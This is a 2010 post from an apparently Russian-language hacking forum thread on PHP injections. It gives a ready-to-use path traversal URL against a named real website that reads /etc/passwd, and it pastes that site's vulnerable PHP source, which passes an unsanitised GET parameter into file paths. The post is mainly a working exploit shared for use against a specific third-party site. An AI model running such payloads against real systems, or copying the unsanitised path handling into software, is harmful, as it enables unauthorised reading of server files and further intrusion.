Тема: PHP Иньекции
Показать сообщение отдельно

  #1212  
Старый 22.10.2010, 20:27
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами: 8603287

Репутация: 87
По умолчанию
http://metanohi.org/browse/no-js.php?u=../../../etc/passwd

с лева читалка всех файлов..

уязвимый код: browse/no-js.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]getraw[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$tt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]= array();

function[/COLOR][COLOR="#0000BB"]add[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"]) {

 global[/COLOR][COLOR="#0000BB"]$tt[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"];

 while ([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]current[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]key[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$carr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]];

if ([/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]'*files*'[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]sizeof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"])] =[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$tt[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];

if ([/COLOR][COLOR="#0000BB"]is_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$carr[/COLOR][COLOR="#007700"]))

[/COLOR][COLOR="#0000BB"]add[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$carr[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$files[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'*files*'[/COLOR][COLOR="#007700"]];

 if ([/COLOR][COLOR="#0000BB"]is_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$files[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$spath[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]implode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"];

 if ([/COLOR][COLOR="#0000BB"]sizeof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]]) >[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]$tt[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"];

 foreach ([/COLOR][COLOR="#0000BB"]$files[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$spath[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"];

 if ([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]) -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) !=[/COLOR][COLOR="#DD0000"]'~'[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]$tt[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];

 }

 }

[/COLOR][COLOR="#0000BB"]array_splice[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sizeof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]) -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$tt[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

 }

[/COLOR][COLOR="#0000BB"]next[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"]);

 }

 }

[/COLOR][COLOR="#0000BB"]add[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lr[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$tt[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"];

 foreach ([/COLOR][COLOR="#0000BB"]$lr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'*files*'[/COLOR][COLOR="#007700"]] as[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]) {

 if ([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]) -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) !=[/COLOR][COLOR="#DD0000"]'~'[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]$tt[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];

 }

[/COLOR][COLOR="#0000BB"]$tt[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

}

[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'u'[/COLOR][COLOR="#007700"]];

if (![/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'vijuv'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$namet[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'#'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$nametp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'#'[/COLOR][COLOR="#007700"];

}

else {

[/COLOR][COLOR="#0000BB"]$namet[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"../[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$nametp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"../:[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];

}

[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]= include([/COLOR][COLOR="#DD0000"]'get.php'[/COLOR][COLOR="#007700"]);

if (![/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'Click on a filename in the left pane to show the content of that file.'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]?>

[/COLOR][/COLOR] 
 
Ответить с цитированием